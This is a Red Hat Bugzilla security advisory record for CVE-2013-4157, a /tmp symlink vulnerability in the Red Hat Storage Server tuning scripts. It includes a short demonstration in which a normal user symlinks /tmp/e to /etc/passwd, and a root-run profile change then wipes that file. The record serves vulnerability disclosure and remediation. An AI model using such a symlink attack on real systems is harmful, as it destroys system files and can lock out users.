Bug 986516 (CVE-2013-4157)

Summary: CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-server /tmp file creation vuln
Product: [Other] Security Response Reporter: Kurt Seifried <kseifried>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: aavati, barumuga, grajaiya, jrusnack, rfortier, security-response-team, shaines, ssaha, vagarwal, vbellur
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2013-09-04 18:48:25 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 986517, 986518    
Bug Blocks: 986520    

Description Kurt Seifried 2013-07-20 04:52:15 UTC 
Gowrishankar Rajaiyan (grajaiya) reports:

I found a potential security issue with 
redhat-storage-server-1.7.3-2.el6rhs.noarch previously known as 
appliance-base-1.7.3-1.el6rhs while verifying 
https://bugzilla.redhat.com/show_bug.cgi?id=910566. [Open URL] This issue also 
exists in the latest released version of RHS 
https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689 [Open URL]

Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh 
and /etc/tune-profiles/rhs-virtualization/ktune.sh
<snip>
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
</snip>


A file "e" is created in /tmp directory. This information is public at 
https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 [Open URL] (I set it to 
private now, not sure if that helps). So any normal user can create a 
softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as 
root user, hence, exposes a security loop hole where in a normal user 
can wipe out /etc/passwd.

Please guide on how to proceed from here.


A demonstration is as follows:
As normal user:
[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/

[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log
-rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root root 0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$

As root:
[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on 
brick devices:
[ OK ]
Reverting to cfq elevator: dm-0 dm-1 [ OK ]
Stopping tuned: [ OK ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on 
brick devices:
[ OK ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1 [ OK ]
Starting tuned: 'import site' failed; use -v for traceback
[ OK ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#
Comment 3 Kurt Seifried 2013-07-20 05:30:57 UTC 
Also there appear to be more vulnerabilities:

/etc/tune-profiles/rhs-virtualization/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-virtualization/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-virtualization/ktune.sh:          done) 2>> /tmp/bricks.err
/etc/tune-profiles/rhs-virtualization/ktune.sh:          echo '* hard nofile 16384' ) > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-high-throughput/ktune.sh:          done) 2>> /tmp/bricks.err
Comment 4 Murray McAllister 2013-09-04 11:34:45 UTC 
Acknowledgements:

These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.
Comment 5 errata-xmlrpc 2013-09-04 18:10:55 UTC 
This issue has been addressed in following products:

  Red Hat Storage 2.0

Via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html